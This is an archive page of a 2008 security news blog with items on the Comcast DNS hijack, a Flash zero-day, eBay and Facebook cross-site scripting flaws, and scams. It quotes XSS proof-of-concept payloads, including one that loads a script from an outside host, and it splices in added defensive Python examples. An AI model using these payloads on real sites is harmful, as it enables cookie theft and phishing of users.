CyberInsecure.com

Daily cyber threats and internet security news alerts

Archive for May, 2008

Movie Sharing Program Causes A Security Breach In University Of California San Francisco

Saturday, May 31st, 2008

During routine University of California San Francisco (UCSF) monitoring of the campus computer network on January 11, 2008, UCSF discovered unusual data traffic on one of its computers. The investigation was completed this month and shows that an unauthorized movie-sharing program had been installed on this computer on or about December 2, 2007, by an unknown individual. The computer also held personal patient information of 3569 patients of Pathology and Laboratory Medicine. Installation of this program required high-level system access, which is why the incident is considered a security breach.

The University of California San Francisco alerted the group of patients that it has discovered a security breach after immediately removing the computer from the network to prevent further access. There is no indication that any patient files were accessed. According to UCSF, the administration takes this situation very seriously and is therefore responding with the highest level of caution and concern.

UCSF conducted a thorough investigation into the incident to assess how this breach occurred and whether any patient information may have been compromised. The data included information such as patient names, dates of pathology service, health information and, in some cases, social security numbers. The Department of Pathology has notified 2,625 UCSF patients whose information was contained on the computer. The files also included 944 patients whose tissue samples had been referred by other health care providers to UCSF for analysis.

A top-level task force has been created to improve the system of controls to protect patient information and other sensitive data. This task force is composed of campus leadership and is chaired by Executive Vice Chancellor and Provost Eugene Washington.

UCSF has established a special phone line (415) 353-7427 and a special email address PathHotline@ucsf.edu to answer questions from patients who received notification letters informing them about this recent breach.

Hackers Have Cracked N-Gage Application, Allowing It To Run Pirated Games On Other Devices

Saturday, May 31st, 2008

According to Pocketgamer, it seems hackers have cracked the new N-Gage application, allowing it to work on a host of other Series 60 devices. A few online forums offer users a download link to an application that is said to work on Series 60 v3 handsets including the E65, 5700 XpressMusic, N73, N71, E51, 6110 and 6210c.

Some forums also offer a five-step process to get the application installed on these handsets, as well as to install cracked versions of N-Gage games. The forum threads have had tens of thousands of views and claim to offer cracked versions of N-Gage games, including System Rush Evolution, Mile High Pinball, Space Impact: Kappa Base, Asphalt 3: Street Rules, and Hooked On: Creatures of the Deep.

Nokia has recently cited its strict DRM as one of the reasons why gamers would have to re-buy their N-Gage games if they switched handsets. During its First Access beta trial, Nokia looked benignly on users trying to get the N-Gage app working on non-supported phones, claiming it showed the pent-up demand for N-Gage.

The fact that online forums are offering cracked versions of the games (finding them takes about 10 seconds of Google searching) is likely to be a problem for Nokia. The company is already aware of the issue and is expected to provide more information and details in the near future.

Hacked Comcast.net Leaves Users Without Email Access

Thursday, May 29th, 2008

Comcast.net, the portal of US communications provider Comcast, was hacked on Wednesday night. As a result of the attack Comcast subscribers were unable to access their email or other services through the portal for more than two hours. Comcast is the second biggest ISP in the US and a major provider of cable TV services.

The comcast.net front page was replaced by a greeting from hackers on May 28. The defacement was removed after more than two hours. Users were then confronted by a “page under construction” message before the site was restored in the early hours of Thursday morning. The site remained intermittently unavailable even after this time. The exact mechanism of the attack is still unclear, though an injected iFrame that served up content from sites under the control of hackers is suspected. Some form of DNS redirection attack may also have been involved.

Normally defacement attacks simply involve some text message or an image on a website. However, in the case of the Comcast attack it seems some attempt may have been made to snoop on its users’ login credentials.

There is still a lot of speculation about the details of the attack and why it happened. The defacement was claimed by two hackers who left the following message on a blank white page at Comcast.net: “KRYOGENIKS Defiant and EBK RoXed COMCAST sHouTz To VIRUS Warlock elul21 coll1er seven”.

Update: Not only did the hackers hijack Comcast’s domain name for three hours overnight, they also sent subscribers who tried to access webmail and other services to a rogue site that bragged of the exploit.

Comcast lost control of the comcast.net address after the attackers changed registration information stored by its domain registrar, Network Solutions. The unauthorized change redirected people attempting to visit the site to a page that read: “KRYOGENIKS Defiant and EBK RoXed COMCAST. sHouTz To VIRUS Warlock elul21 coll1er seven.” The page was displayed after the attackers altered the site’s IP resolution information, replacing Comcast’s IP address with the rogue address 209.62.20.186. In addition to their cryptic defacement, they altered the address for Comcast’s administrative contact to “69 dick tard lane, dildo room.”

Comcast said there was no immediate evidence that the attackers’ page tried to install malware or steal user credentials. But some reports claimed that email clients were redirected to the impostor address, requesting their login name and password.

It’s still unclear how the attackers accessed the registration settings stored with Network Solutions. A Network Solutions spokeswoman said the company is working with Comcast to figure out how the hackers obtained the login credentials to the account. Comcast is also working with unnamed law enforcement agencies to track down the attackers.

68 Fixes In Apple Update 10.5.3 and Apple Security Update 2008-003

Thursday, May 29th, 2008

More than three months after its last update for Mac OS X, Apple has released an update with numerous stability, compatibility and security fixes. Mac OS X 10.5.3, the third update to Leopard since Apple launched the current version in October 2007, addresses issues in several components and bundled applications. Some of these are updates to Apple’s own software and others are updates to the open source packages that Apple ships with its operating system. Apple did not include patches for two of the three iCal vulnerabilities that were made public a week ago.

Updates to the following security related modules were made:

AFP Server — Files that are not designated for sharing may be accessed remotely.

Apache — Multiple vulnerabilities in Apache 2.0.55, including cross-site scripting. Apache is updated to version 2.0.63 to address several vulnerabilities.

AppKit — Maliciously crafted file, unexpected application termination, arbitrary code execution.

Apple Pixlet Video — Vulnerability to unexpected application termination, arbitrary code execution.

ATS — Vulnerability to arbitrary code execution.

CFNetwork — Vulnerability leading to disclosure of sensitive information.

CoreFoundation — Vulnerability leading to unexpected application termination or arbitrary code execution.

CoreGraphics — Vulnerability that may lead to an unexpected application termination or arbitrary code execution.

CoreTypes — Lack of prompting against opening “certain potentially unsafe content types” in Automator, Help, Safari, and Terminal.

CUPS — Information disclosure.

Flash Player Plug-in — Arbitrary code execution; updated to version 9.0.124.0.

Help Viewer — Vulnerability to application termination or arbitrary code execution.

iCal — Vulnerability to unexpected application termination or arbitrary code execution.

International Components for Unicode — Disclosure of sensitive information.

Image Capture — Path traversal vulnerability.

ImageIO — Out-of-bounds memory read leading to information disclosure, multiple vulnerabilities in libpng version 1.2.18, and a vulnerability leading to unexpected application termination or arbitrary code execution.

Kernel — Remote vulnerability to unexpected system shutdown due to an undetected failure condition, and local user vulnerability to unexpected system shutdown due to mishandling of code signatures.

LoginWindow — Race condition preventing MCX preferences being applied.

Mail — IPv6 vulnerability leading to unexpected application termination, information disclosure, or arbitrary code execution.

ruby — Remote vulnerability; updated to version 1.1.4.

Single Sign-On — Password disclosure in sso_util.

Wiki Server — Remote vulnerability to information disclosure.

Mac OS X 10.5.3 can be downloaded manually from the Apple site, or retrieved and installed using Mac OS X’s integrated update feature.

New Adobe Flash Vulnerability Exploited In Latest Mass SQL Injection Attack

Wednesday, May 28th, 2008

A recent Adobe Flash vulnerability is already being abused in another mass compromise, again through SQL injection. This malware attack has once again been traced back to Chinese hackers, who are using a zero-day exploit to infect users with password-stealing malware.

This zero-day exploit takes advantage of an unknown vulnerability in Adobe Flash Player, allowing malicious users to install information-stealing trojans on affected PCs. Integer overflow in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, allows remote attackers to execute arbitrary code via a crafted SWF file with a negative Scene Count value, which passes a signed comparison, is used as an offset of a NULL pointer, and triggers a buffer overflow.
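To show the bug class the description above names, here is an added Python example (mine, not Adobe’s code; the record layout is a hypothetical simplification, not the real SWF format) that reads a constructed 32-bit "scene count" with the signed, upper-bound-only check beside a hardened unsigned, length-bounded check, and emulates where NULL plus the resulting negative offset lands.

```python
import struct

# Hypothetical simplified record layout (NOT the real SWF format): a 4-byte
# little-endian scene count followed by fixed-size scene entries.
HEADER_SIZE = 4
ENTRY_SIZE = 8
MAX_SCENES = 1024


def build_record(count_bits, entries=b""):
    """Constructed test data: raw 32-bit count field followed by entry bytes."""
    return struct.pack("<I", count_bits) + entries


def vulnerable_scene_offset(data):
    """Reads the count as a SIGNED 32-bit int and checks only the upper bound.
    A value such as 0xFFFFFFF0 reads as -16, passes 'count > MAX_SCENES'
    and yields a negative table offset."""
    (count,) = struct.unpack_from("<i", data, 0)
    if count > MAX_SCENES:
        raise ValueError("too many scenes")
    return HEADER_SIZE + count * ENTRY_SIZE


def hardened_scene_offset(data):
    """Reads the count as UNSIGNED, bounds it, and checks that the table
    actually fits inside the buffer before any offset is derived from it."""
    if len(data) < HEADER_SIZE:
        raise ValueError("truncated header")
    (count,) = struct.unpack_from("<I", data, 0)
    if count > MAX_SCENES:
        raise ValueError("too many scenes")
    end = HEADER_SIZE + count * ENTRY_SIZE
    if end > len(data):
        raise ValueError("scene table runs past end of data")
    return end


def pointer_after_offset(base, offset):
    """Emulates 32-bit pointer arithmetic 'base + offset' so the negative
    offset can be seen landing far from base (0 = NULL, as in the advisory)."""
    return (base + offset) & 0xFFFFFFFF


def rejects(check, data):
    """True if the given check raises ValueError on the data."""
    try:
        check(data)
    except ValueError:
        return True
    return False


BENIGN = build_record(2, b"\x00" * (2 * ENTRY_SIZE))      # 2 entries, present
CRAFTED = build_record(0xFFFFFFF0)                        # -16 when read signed
TRUNCATED = build_record(2, b"\x00" * ENTRY_SIZE)         # claims 2, has 1

if __name__ == "__main__":
    print("benign offset:", vulnerable_scene_offset(BENIGN),
          hardened_scene_offset(BENIGN))
    off = vulnerable_scene_offset(CRAFTED)
    print("crafted passes vulnerable check, offset =", off,
          "-> NULL+offset = 0x%08x" % pointer_after_offset(0, off))
    for name, rec in (("crafted", CRAFTED), ("truncated", TRUNCATED)):
        print("hardened rejects %s: %s" % (name, rejects(hardened_scene_offset, rec)))
```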

Legitimate sites were found to have been injected with scripts that silently lead browsers to sites hosting exploits for the Flash vulnerability. When certain system conditions allow the exploitation to proceed, PCs download and execute info-stealers (like TSPY_UPACK.D) or droppers (like TROJ_DROPPER.NAK) through infected .SWF files, detected by TrendLabs as SWF_DLOADER.YVM and SWF_DLOADER.YVN. Other components of this infection are detected as HTML_DLDR.BF, TSPY_UPACK.D and TROJ_DROPPER.NAK.

Some domains in this attack spoof the domain name of legitimate and known phone company Nokia, as well as that of the popular online game Defense of the Ancients (DotA). Other domains are lkjrc.cn and woai117.cn (obviously, since .cn domains cost about 1 cent each).

A list of domains that currently serve malicious files was posted on Dancho Danchev’s blog.


At this moment there is no known patch available from Adobe, and no known workaround. Again, avoid visiting unknown sites or use Firefox with the NoScript plugin.

Update (May 29): The malicious SWF file found in-the-wild has been found to affect Adobe Flash Player 9.0.115.0 and earlier, not the latest version 9.0.124.0.

According to Symantec, this issue was believed to be unpatched and unknown, but further technical analysis has revealed that it is the previously reported Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability (BID 28695), discovered by Mark Dowd of IBM. Adobe has released an official statement noting that Flash Player version 9.0.124.0 isn’t affected by these attacks and confirming that the SWF files are in fact leveraging this flaw.

Official statement by Adobe.

Users are advised to ensure that Flash is updated to version 9.0.124.0.

Adobe Flash Player SWF File Zero-Day Remote Code Execution Vulnerability

Tuesday, May 27th, 2008

Adobe Flash Player is prone to an unspecified remote code-execution vulnerability. An attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Adobe Flash Player 9.0.115.0 and 9.0.124.0 are vulnerable; other versions may also be affected.

According to Symantec, this issue is being actively exploited in the wild and hence the DeepSight ThreatCon is being raised to Level 2. The flaw occurs when processing a malicious SWF file. Currently two Chinese sites are known to be hosting exploits for this flaw: wuqing17173.cn and woai117.cn. The sites appear to be exploiting the same flaw, but are using different payloads. At the moment these domains do not appear to be resolving, but they may come back in the future. Further analysis of these attacks, specifically the woai117.cn attack, uncovered another involved domain, dota11.cn.

Google search reports approximately 20,000 web pages (not necessarily distinct servers or domains) injected with a script redirecting users to this malicious site. A wide variety of legitimate third-party sites appear to be affected. The code then redirects users to sites hosting malicious Flash files exploiting this issue. According to ZDNet, this zero-day flaw has already been added to the Chinese version of the MPack exploit kit.

Currently there are no vendor-supplied patches. Users are strongly advised to disable Flash until patches are available, avoid browsing to untrustworthy sites and deploy script-blocking mechanisms, such as NoScript for Firefox.

Update (May 29): The malicious SWF file found in-the-wild has been found to affect Adobe Flash Player 9.0.115.0 and earlier, not the latest version 9.0.124.0.

According to Symantec, this issue was believed to be unpatched and unknown, but further technical analysis has revealed that it is the previously reported Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability (BID 28695), discovered by Mark Dowd of IBM. Adobe has released an official statement noting that Flash Player version 9.0.124.0 isn’t affected by these attacks and confirming that the SWF files are in fact leveraging this flaw.

Official statement by Adobe.

Users are advised to ensure that Flash is updated to version 9.0.124.0.

Another Cross-Site Scripting Vulnerability On eBay Domain Sites Allows Phishing

Tuesday, May 27th, 2008

According to an XSSed report, eBay is vulnerable to cross-site scripting (XSS) that might be abused by scammers to take over eBay user accounts. JavaScript code injection can redirect users to fake phishing pages where they are asked to log in to their account. Victims who click on what appears to be a genuine eBay search result are also vulnerable to malware infection.

Among affected domains there are:

motors.desc.shop.ebay.com
shop.ebay.com
search.express.ebay.com
motors.shop.ebay.com

Last year’s cross-site scripting vulnerability on eBay could trick people into handing over their personal information to scammers. eBay promptly patched the flaw, but experts wondered how long the fix would hold. The previous flaw was exactly the same and allowed a scammer to use this type of attack to redirect people from an eBay listing to a spoofed eBay site. A year ago experts said that hackers could easily modify the JavaScript code to trigger the same behavior once again, and it seems they were right.

Here is the vulnerability example from XSSed:

<SCRIPT>if (top == window)location.href ='http://www.any-domain.com'</SCRIPT>

The XSS issues were submitted to XSSed by S_e_YM_e_N, Azat Harutyunyan, www.r3t.n3t.nl and Uber0n.

The vulnerability was already reported to eBay but currently remains unfixed.

Google Docs Abused In Latest Spam Technique

Monday, May 26th, 2008

Spammers have adopted Google Docs in order to borrow the credibility of Google’s domain, since spam filters would not declare a Google link as spam. According to MessageLabs, this latest spammer technique is used to get around blocking and blacklisting of spam-hosting domains.

Since hosted Google Docs live under the domain docs.google.com, it would be possible to ban that address, but there are so many users of this platform that a large number of legitimate non-spam emails would be blocked. A very popular way to block spam is with URL block lists, but with the name “Google” in it, the link is never going to be blocked because of all the legitimate uses.

Sending attachments like JPGs or Word .doc files has proven less successful than just sending the user a link, and that’s why the new misuse of Google Docs might become more popular. Spam with just a URL isn’t foolproof either: spam filters have relied on checking the links in e-mails and blocking them based on suspicious Web addresses.

The way around this is to check the sender’s IP, which might be hard for companies. Unless they can filter based on source IP, the only way to catch it is through sender IP reputation.

There is also a good side to this technique: Google Docs pages are much less dynamic than HTML. The best spammers can do is put links in the page to get victims to click through to another site. HTML code cannot be embedded, no malicious IFRAME can be added, and no malicious JavaScript code can run. Another obstacle would be the creation of a lot of Google accounts. That wouldn’t be easy to do because Google has methods in place (CAPTCHA) to stop automated account creation.

MessageLabs has found an example, a typical sexual enhancement advertisement, that asked the recipient to click on a link to a Google Docs page. From that page, more links led to sites selling Viagra. The page was reported as spam to Google on May 8 but is still live.

So far, MessageLabs hasn’t seen large numbers for this method yet, but Google’s Blogspot blogging service is frequently used by spammers, so the spammers may just be getting started. Spammers still use Blogspot as an intermediate drop page, so they may refine this method a little more and stick with it, unless it fails their spamming hopes and they drop it.

There is no Google response available on this subject at this moment.

Fraudulent avast! Anti-Virus Products Advertised Via Google AdWords

Saturday, May 24th, 2008

Fraudulent sales of the free avast! Home Edition anti-virus are being made via several web sites, many advertised through the Google AdWords program. Scam websites are offering keys to the free avast! Home Edition and charging users as if it were the paid Professional Edition. When email “invoices” are received by customers, there is no mention of avast!; instead there is a list of programs that the customer has never heard of, let alone agreed to buy.

Such websites are in no way associated with the avast! developer (ALWIL Software) and have no way to issue licenses. Any money you spend with them will not result in a genuine paid-for license. One way to spot a fraudulent site is a message at the bottom of the website, often in small lettering:

This website has no affiliation whatsoever with the owner of this software program, and provides ONLY a link to the software program.

Another way to spot these scam sites is that they will often mention offering a “lifetime” license or a “Gold Package”. No such packages exist for avast! anti-virus.

A list of known scam sites has been published. None of those sites has any connection with ALWIL Software, and none is an authorized reseller of avast!.


“Download Assist (My Downloading)”, “Market Bill” and “mywebcs” might appear as the payment descriptor on your credit card statement if you have purchased from one of these sites.

Some of those sites are offering free avast! Home Edition wrapped in a new installer which requires a premium rate SMS to be sent in order to gain a license key.

Avast! advises customers to contact their credit card issuer if they have purchased from one of these sites, and report the transaction as fraudulent. This will allow the credit card company to instigate a chargeback against the site, returning money to customers. Customers may also wish to contact their local law enforcement organization for statistical monitoring purposes. Customers who cannot confirm where their purchase has been made are encouraged to contact avast! sales if they have any doubts as to the validity of such purchases.

New Cross-Site Scripting Vulnerability Found On Facebook

Friday, May 23rd, 2008

According to XSSed, Facebook is vulnerable to a cross-site scripting flaw that leaves its users at risk from scripting attacks and login phishing. The security blog has posted a proof of concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third party sites.

Here is a harmless proof of concept, shown at XSSed:

http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
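Added example (my code, not XSSed’s or the original posts’): Python that percent-decodes query parameters and flags the markup patterns used in the eBay and Facebook proofs of concept above, runs the same check over constructed web-server log lines, and shows the escaped form a page should reflect instead. The shop.ebay.com/search?q= URL, the log lines and all function names are assumptions.

```python
import html
import re
from urllib.parse import quote, unquote, urlsplit

# Patterns that should never appear in a search or job parameter which the
# page reflects into its HTML unescaped.  They are matched against the
# percent-decoded, lower-cased value so encoded forms like %3Cscript%3E hit.
SUSPICIOUS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b"),
    "iframe_tag": re.compile(r"<\s*/?\s*iframe\b"),
    "js_uri": re.compile(r"javascript\s*:"),
    "event_handler": re.compile(r"\bon[a-z]+\s*="),
    "attr_breakout": re.compile(r"[\"']\s*>"),
}


def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%253C) are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(url_or_path):
    """Split the query on '&' and the first '=' only, so a payload that itself
    contains '=' (e.g. iframe src=...) stays in one value."""
    for pair in urlsplit(url_or_path).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote(name), value


def find_injected_markup(url_or_path):
    """Return sorted (param, reason) pairs for query values carrying markup."""
    findings = set()
    for name, raw in query_params(url_or_path):
        value = decode_param(raw).lower()
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(value):
                findings.add((name, reason))
    return sorted(findings)


def scan_access_log(lines):
    """Run the check over log lines; returns (line_no, param, reason) hits."""
    request = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = request.search(line)
        if match:
            for param, reason in find_injected_markup(match.group(1)):
                hits.append((line_no, param, reason))
    return hits


def reflect_safely(raw_value):
    """What a page should emit when echoing a parameter back into its HTML."""
    return html.escape(decode_param(raw_value), quote=True)


# The two Facebook proofs of concept quoted above, and the eBay snippet placed
# in a constructed search URL (the shop.ebay.com/search?q= path is assumed).
FACEBOOK_POC_1 = ("http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src="
                  "http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E")
FACEBOOK_POC_2 = "http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E"
EBAY_SNIPPET = "<SCRIPT>if (top == window)location.href ='http://www.any-domain.com'</SCRIPT>"
EBAY_URL = "http://shop.ebay.com/search?q=" + quote(EBAY_SNIPPET, safe="")
BENIGN_URL = "http://shop.ebay.com/search?q=nokia+n73&page=2"

# Constructed access-log lines (Common Log Format) for scan_access_log.
SAMPLE_LOG = [
    '10.0.0.1 - - [23/May/2008:10:00:00 +0000] "GET /jobs/position.php?st=engineer HTTP/1.1" 200 512',
    '10.0.0.2 - - [23/May/2008:10:00:01 +0000] "GET /jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for url in (FACEBOOK_POC_1, FACEBOOK_POC_2, EBAY_URL, BENIGN_URL):
        print(url[:60], "->", find_injected_markup(url))
    print("log hits:", scan_access_log(SAMPLE_LOG))
    print("safe reflection:", reflect_safely(quote(EBAY_SNIPPET, safe="")))
```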

Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.

Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.

At this moment the flaw is still open. Facebook has already been notified of the vulnerability.

Update (May 27): Facebook fixed this vulnerability a couple of days ago.

Hackers Might Exploit Apple’s iCal Memory Corruption Vulnerability

Thursday, May 22nd, 2008

According to security vendor Core Security Technologies, Apple’s iCal calendar application contains three vulnerabilities that could allow an attacker to crash the application or execute remote code on the victim’s Mac. Core Security released an advisory on Wednesday detailing the vulnerabilities, which affect iCal version 3.0.1 running under Mac OS X 10.5.1 (Leopard).

In order for an attacker to exploit these vulnerabilities, an iCal user must be convinced to open an .ics file sent via e-mail or hosted on a Web server. The ability to add or modify files on a CalDAV server would allow the attacker to trigger the exploits directly. This is the most serious of the three vulnerabilities and is possible due to potential memory corruption resulting from a resource liberation bug.

The other two vulnerabilities could be used to crash iCal using a maliciously crafted iCal (.ics) file. There is a possibility to use these two flaws for execution of arbitrary code but so far there is no proof such an attack is possible.

Core Security notified Apple of the vulnerabilities back in January. In February, Apple said it would fix the bugs in its March security patch, but it didn’t. Core Security then rescheduled publication of information about the vulnerabilities for April. So far Apple has not addressed the vulnerabilities, and Core said it is about to publish the information to the public.

Hackers And Scammers Continue To Exploit China Earthquake

Thursday, May 22nd, 2008

Spammers and scammers are always ready to jump on the latest disaster or big news headline to try to exploit users. This time it is the Chinese earthquake disaster, which killed more than 50,000, that is being exploited to push scams and malware spam.

In one report scammers sent out text messages enticing people to send donations to fund aid for helpless victims. Today there was a report of a spam message allegedly from a Filipino seeking financial aid to follow his wounded wife in China.

Here are the first and last portions of the long-winded letter designed to get merciful recipients to take action, i.e. donate money. It starts with:

Dear friend,

I do not know your exact name. I can only guess. I ask you to read through my letter up to the end.

And ends:

And still, if you will be able to help me I shall consider you to be the best man in this world. You will save a life of mine Jin. I shall write the data on which I will be able to receive cashes in Philippines through Western Union.

Next there are emails with infected Word attachments that carry the MalDoc-Fam Trojan. They are being distributed in messages that pose as news about the disaster, net security firm Sophos reports. The malware-tainted emails typically appear with body text suggesting they contain news from China’s official press agency, Xinhua:

BEIJING, May 20 (Xinhua) — The death toll from the earthquake in southwest China’s Sichuan Province has risen to 34,074 nationwide as of 2 p.m. Saturday, while 198,347 people were injured, according to the Information Office of the State Council. Pay attention to attachment for more.

Opening the attached Word document triggers an exploit that downloads malware onto vulnerable Windows PCs. The MalDoc-Fam Trojan is more than a year old, dating from March 2007.

These schemes, much like those that surfaced during previous tragedies, are surely only some of the many that will continue to use this ploy.

Recent reports tell that even the official Web site for donations to the earthquake victims in China, the Chinese Red Cross, has itself been hacked to divert donations elsewhere. Ironically, even if you carefully donate only to legitimate organizations, you can never be sure who will actually get the money nowadays.

Users should be extremely cautious in extending their help. If possible, keep a closer watch of who gets the donation and where it goes.